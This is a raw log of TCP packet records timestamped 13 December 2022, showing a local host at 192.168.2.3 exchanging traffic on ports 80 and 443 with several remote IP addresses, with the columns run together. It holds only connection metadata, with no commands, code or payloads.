                                              Dec 13, 2022 20:07:42.481149912 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.497251034 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497309923 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497323036 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497344017 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497356892 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497369051 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497384071 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497395992 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497407913 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497435093 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497454882 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497478008 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497489929 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497509003 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497519970 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497534037 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497550964 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497562885 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497575045 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497637987 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497654915 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497673035 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497709036 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497792006 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497962952 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497994900 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498008966 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498027086 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498070955 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498157024 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498172045 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498234034 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498311043 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498339891 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498711109 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498748064 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498764038 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498778105 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498791933 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498806000 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498836040 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498893023 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498908043 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498922110 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498943090 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.499001026 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499070883 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499119997 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499161959 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499176979 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499238968 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499279022 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499293089 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499314070 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499327898 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499346972 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.499414921 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499428034 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499474049 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499511957 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499553919 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499651909 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499667883 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499681950 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499711037 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499795914 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499833107 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499859095 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499872923 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499912977 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.500003099 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.500039101 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.500052929 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.547748089 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.547856092 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:49.880563021 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.880621910 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.880705118 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.881911993 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.881938934 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.967329025 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.967442036 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.976569891 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.976596117 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.977266073 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.008229017 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.008261919 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.027926922 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.028023958 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.028126955 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.048912048 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.048954964 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.048974991 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.048985004 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.173464060 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.173516989 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.173599958 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.174017906 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.174041033 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.237426996 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.238059044 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.238097906 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.238950014 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.238964081 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.272506952 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.272588968 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.272703886 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.318113089 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.318146944 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.318167925 CET49698443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.318175077 CET4434969823.35.236.109192.168.2.3
                                              Dec 13, 2022 20:08:27.304214001 CET804968393.184.220.29192.168.2.3
                                              Dec 13, 2022 20:08:27.304325104 CET4968380192.168.2.393.184.220.29
                                              Dec 13, 2022 20:08:30.110555887 CET49685443192.168.2.323.35.237.194
                                              Dec 13, 2022 20:08:30.110846996 CET4968680192.168.2.393.184.220.29
                                              Dec 13, 2022 20:08:30.429653883 CET8049695209.197.3.8192.168.2.3
                                              Dec 13, 2022 20:08:30.429694891 CET8049692209.197.3.8192.168.2.3
                                              Dec 13, 2022 20:08:30.429779053 CET4969580192.168.2.3209.197.3.8
                                              Dec 13, 2022 20:08:30.429930925 CET4969280192.168.2.3209.197.3.8
                                              Dec 13, 2022 20:08:32.567418098 CET49689443192.168.2.32.20.195.105
                                              Dec 13, 2022 20:08:32.589082003 CET443496892.20.195.105192.168.2.3
                                              Dec 13, 2022 20:08:32.589140892 CET443496892.20.195.105192.168.2.3
                                              Dec 13, 2022 20:08:32.589248896 CET49689443192.168.2.32.20.195.105
                                              Dec 13, 2022 20:08:32.591536999 CET49689443192.168.2.32.20.195.105
                                              Dec 13, 2022 20:08:32.726648092 CET4969180192.168.2.38.238.85.254
                                              Dec 13, 2022 20:08:32.727494955 CET4968380192.168.2.393.184.220.29
                                              Dec 13, 2022 20:08:32.727603912 CET49690443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:08:33.035332918 CET4969280192.168.2.3209.197.3.8
                                              Dec 13, 2022 20:08:33.035454988 CET4969380192.168.2.38.238.88.254
                                              Dec 13, 2022 20:08:33.035641909 CET4969480192.168.2.393.184.221.240
                                              Dec 13, 2022 20:08:33.035675049 CET4969580192.168.2.3209.197.3.8
                                              Dec 13, 2022 20:08:33.053150892 CET8049695209.197.3.8192.168.2.3
                                              Dec 13, 2022 20:08:33.054450989 CET804969493.184.221.240192.168.2.3
                                              Dec 13, 2022 20:08:33.054600954 CET4969580192.168.2.3209.197.3.8
                                              Dec 13, 2022 20:08:33.055389881 CET4969480192.168.2.393.184.221.240
                                              Dec 13, 2022 20:08:33.056278944 CET80496938.238.88.254192.168.2.3
                                              Dec 13, 2022 20:08:33.056360006 CET4969380192.168.2.38.238.88.254
                                              Dec 13, 2022 20:08:33.057626009 CET8049692209.197.3.8192.168.2.3
                                              Dec 13, 2022 20:08:33.057738066 CET4969280192.168.2.3209.197.3.8
                                              Dec 13, 2022 20:08:50.045682907 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.072418928 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.072535038 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.072694063 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.075409889 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.102993965 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.103102922 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.189378023 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.189431906 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.189495087 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.189543009 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.189739943 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.189817905 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.190135002 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.190920115 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.191149950 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.191210032 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.191365957 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.191437006 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.191576004 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.191920996 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.192001104 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.216603041 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.216636896 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.216716051 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.229723930 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229757071 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229782104 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229805946 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229811907 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.229830027 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229844093 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.229854107 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229880095 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229899883 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.229902983 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229926109 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229943037 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.229949951 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229974031 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.229989052 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.243660927 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.243801117 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.271199942 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272614002 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272651911 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272675037 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272715092 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272727013 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272758007 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272787094 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272818089 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272865057 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272896051 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272908926 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.272929907 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.272950888 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.272994041 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.300046921 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.311650038 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.311702967 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.311739922 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.311918020 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.311975002 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.311984062 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.312019110 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312062979 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312076092 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.312108040 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312150002 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312166929 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.312192917 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312237024 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312246084 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.312280893 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312325001 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.312333107 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.338603973 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.338702917 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.353306055 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353369951 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353414059 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353440046 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.353482962 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353528976 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353528976 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.353573084 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353614092 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.353615999 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353658915 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353702068 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353705883 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.353743076 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353785992 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353790045 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.353827000 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353868008 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.353869915 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.365257025 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.365370989 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.403350115 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403414965 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403459072 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403497934 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.403502941 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403558016 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403573990 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.403600931 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403645039 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403662920 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.403690100 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403732061 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403752089 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.403774023 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403815031 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403847933 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.403856039 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403898001 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.403913975 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.431448936 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.431565046 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.444152117 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444222927 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444267035 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444295883 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.444310904 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444353104 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444360971 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.444399118 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444442034 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444463968 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.444487095 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444528103 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444562912 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.444574118 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444614887 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444624901 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.444657087 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444699049 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444709063 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.444741964 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.444792032 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.458525896 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488025904 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488063097 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488086939 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488111019 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488137960 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488159895 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488168001 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.488183022 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488200903 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.488205910 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488228083 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488245964 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.488250971 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488272905 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488276005 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.488296986 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.488316059 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.491401911 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.491435051 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.491554976 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.515017986 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.515275955 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.534498930 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534557104 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534600019 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534641981 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534684896 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534712076 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.534728050 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534759998 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.534775019 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534785032 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.534818888 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534862041 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534918070 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.534926891 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534971952 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.534986019 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.535013914 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.535057068 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.535101891 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.535115957 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.535144091 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.535156965 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.547193050 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.547342062 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.575597048 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.575654030 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.575706005 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.575751066 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.575794935 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.575833082 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.575839043 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.575871944 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:50.575880051 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.575897932 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.575951099 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.576235056 CET4969980192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:50.603251934 CET8049699185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:51.018018961 CET4970080192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:51.045634985 CET8049700185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:51.045800924 CET4970080192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:51.045887947 CET4970080192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:51.046025991 CET4970080192.168.2.3185.246.221.151
                                              Dec 13, 2022 20:08:51.073282957 CET8049700185.246.221.151192.168.2.3
                                              Dec 13, 2022 20:08:51.161029100 CET8049700185.246.221.151192.168.2.3
